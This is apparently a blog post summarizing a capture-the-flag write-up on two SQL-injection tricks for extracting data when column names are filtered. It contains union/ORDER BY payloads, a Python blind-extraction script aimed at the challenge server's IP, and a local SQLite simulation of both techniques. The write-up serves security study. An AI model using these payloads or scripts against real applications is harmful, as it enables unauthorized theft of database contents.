七星网络安全

Two tricks for extracting data by injection when column names are blocked

2017-12-02  rivir

At LCTF there was a challenge called 他们有什么秘密呢 ("What secrets do they have?") that I did not manage to solve, but I learned a lot from the write-ups of the people who did. Here I summarize their ideas for reference.

The challenge has several pitfalls. The error-based injection used to get the table and column names is not covered here, although it is a good topic on its own. What follows are two tricks for getting the data out once the column names themselves are blocked by the filter.

1. ORDER BY blind injection

Payload:

union select 1,2,3,0x{} order by 4%23

0x{} is where our hex-encoded guess goes. The UNION adds a row whose fourth column is our guess, and ORDER BY 4 sorts the real row and the injected row by that column, so the row the page displays first tells us whether the guess sorts before the secret (binary() makes the comparison byte-wise). Holding the recovered prefix fixed and binary-searching the next byte turns this into an ordinary blind extraction. The script:

#!/usr/bin/env python3
# coding: utf-8
# ORDER BY blind extraction script from the write-up, ported to Python 3.
# The original candidate table listed "3C" twice and omitted "7C" ('|');
# it is now generated, which also makes the binary search over it valid.
import requests

url = "http://182.254.246.93/entrance.php"
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'}

# Candidate bytes 0x20..0x7F (space .. DEL) as two-digit hex, in ascending order.
hex_s = ['%02X' % c for c in range(0x20, 0x80)]

old_char = ''  # hex of the prefix recovered so far
# The injected row is (1,2,3,<guess>); ORDER BY 4 decides which row is shown first.
payload = "3 union select 1,2,3,binary(0x{}) order by 4"


def access(p):
    """True when the injected row is displayed first, i.e. prefix+guess sorts before the secret."""
    param = payload.format(old_char + p)
    data = {'pro_id': param}
    res = requests.post(url, data=data, headers=headers).text
    # The injected row carries the literal 2 in its second column, so ':2' in
    # the page means that row was shown first.
    return ':2' in res


def erfen():
    """Binary-search each byte in turn; returns the recovered bytes."""
    global old_char
    for _ in range(len(hex_s)):  # upper bound on the secret length
        l = 0
        r = len(hex_s)
        while l < r:
            mid = (l + r) // 2
            if access(hex_s[mid]):
                l = mid + 1  # guess still sorts before the secret: go higher
            else:
                r = mid
        # l is the number of candidates that sorted first; the last of them is the byte.
        if l == len(hex_s):
            # Every candidate sorted first: the prefix already passed the end
            # of the secret, so stop here.
            return bytes.fromhex(old_char)
        old_char += hex_s[l - 1]
        print('data => ', bytes.fromhex(old_char))
    return bytes.fromhex(old_char)


if __name__ == '__main__':
    s = erfen().decode('latin-1')
    # An injected value equal to the secret is not shown first, so the last
    # byte found is one less than the real one; bump it by one.
    print('flag:', s[:-1] + chr(ord(s[-1]) + 1))

2. Subquery

Payload:

pro_id=-1 union select 1,(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e),3,4

(select e.4 from (select * from (select 1,2,3,4)c union select * from product_2017ctf limit 1 offset 3)e) // e.1, e.2 and e.3 return the first, second and third column in the same way

The derived table (select 1,2,3,4)c gives the union's four columns the names 1, 2, 3 and 4, so e.4 reads the fourth column of product_2017ctf without its real name ever appearing in the request. offset 0 is the dummy row (1,2,3,4) itself, so limit 1 offset 3 returns the third row of the table; this relies on the union keeping the dummy row first, which holds in practice but is not guaranteed without an ORDER BY. The dummy row must have exactly as many columns as product_2017ctf (four here), and if the bare e.4 is rejected, quote the name with backticks: e.`4`.

Once the value is selected, the UNION puts it straight into a displayed column, with no blind loop at all. This is simpler, but it is also easy to block; the WAF in this challenge filtered only a small set of keywords, so it went through.
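Both tricks above, run end to end against a local SQLite stand-in for the challenge page. This is an added example, not code from the write-up or the challenge: the table product(id, name, price, secret), the handler vulnerable_page (which concatenates pro_id into the query and prints only id:name:price of the first row) and the secret value are all constructed here. Two details differ from the MySQL payloads in the post and are assumptions of this simulation: SQLite has no 0x.. string literal, so the guess is sent as CAST(X'..' AS TEXT), and the numbered column is written e.`4` with backticks. The ORDER BY extractor also appends a 0x7f byte to every guess, so a guess can never be equal to the secret; the script's bump-the-last-character compensation is then unnecessary and the count of candidates that sort first gives the byte directly.

```python
#!/usr/bin/env python3
"""Simulation of both tricks against a local SQLite copy of the vulnerable page.

Constructed example, not code from the write-up. Assumed: a table
product(id, name, price, secret) and a handler that concatenates pro_id into
the SQL and prints "id:name:price" of the FIRST row only (secret never shown).
"""
import sqlite3

SECRET = "LCTF{0rder_by_bl1nd}"                # constructed target value
CHARS = [chr(c) for c in range(0x20, 0x7f)]    # candidate bytes, ascending
SENTINEL = "\x7f"                              # larger than any byte in the secret


def make_db(secret=SECRET):
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE product(id INTEGER, name TEXT, price INTEGER, secret TEXT)")
    con.executemany("INSERT INTO product VALUES (?,?,?,?)",
                    [(1, "gizmo", 5, "nope"), (2, "widget", 9, "nah"), (3, "gadget", 19, secret)])
    return con


def vulnerable_page(con, pro_id):
    """The injectable handler: pro_id is concatenated, only the first row is shown."""
    sql = "SELECT id, name, price, secret FROM product WHERE id = " + pro_id
    row = con.execute(sql).fetchone()
    return "not found" if row is None else f"{row[0]}:{row[1]}:{row[2]}"


# --- trick 1: ORDER BY blind -------------------------------------------------
def injected_row_first(con, guess):
    """Oracle: does the injected row (1,2,3,guess) sort before the real row?"""
    hexed = guess.encode().hex()  # SQLite: X'..' is a blob, CAST makes it text
    page = vulnerable_page(con, f"3 UNION SELECT 1,2,3,CAST(X'{hexed}' AS TEXT) ORDER BY 4")
    return page.startswith("1:2:3")


def order_by_blind(con, max_len=64):
    """Recover product.secret of id 3 one byte at a time by binary search.

    Each guess is prefix + candidate + SENTINEL, so prefix+c+SENTINEL < secret
    holds exactly when c < secret[i]: ties cannot occur, and the number of
    candidates that sort first is ord(secret[i]) - 0x20.  A count of zero means
    the whole secret has been recovered (secrets containing spaces are not
    handled, because ' ' would also give zero).
    """
    recovered = ""
    for _ in range(max_len):
        lo, hi = 0, len(CHARS)
        while lo < hi:
            mid = (lo + hi) // 2
            if injected_row_first(con, recovered + CHARS[mid] + SENTINEL):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        recovered += chr(0x20 + lo)
    return recovered


# --- trick 2: subquery with numbered columns ---------------------------------
def pull_cell(con, col, row_index):
    """Read column `col` (1-based) of row `row_index` (0-based) of product without
    naming any column: the dummy row (1,2,3,4) gives the union's columns the
    names 1..4, and OFFSET skips the dummy row plus the rows before the target."""
    inner = (f"SELECT e.`{col}` FROM (SELECT * FROM (SELECT 1,2,3,4) c "
             f"UNION SELECT * FROM product LIMIT 1 OFFSET {row_index + 1}) e")
    page = vulnerable_page(con, f"-1 UNION SELECT 1,({inner}),3,4")
    return page.split(":")[1]  # the value lands in the displayed second column


if __name__ == "__main__":
    con = make_db()
    print("order by blind:", order_by_blind(con))
    print("subquery      :", pull_cell(con, 4, 2))
```

Running it prints the constructed secret twice, once per trick. The ORDER BY path needs about seven requests per byte; the subquery path needs one request per cell, which is why it is the first thing a filter author blocks.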
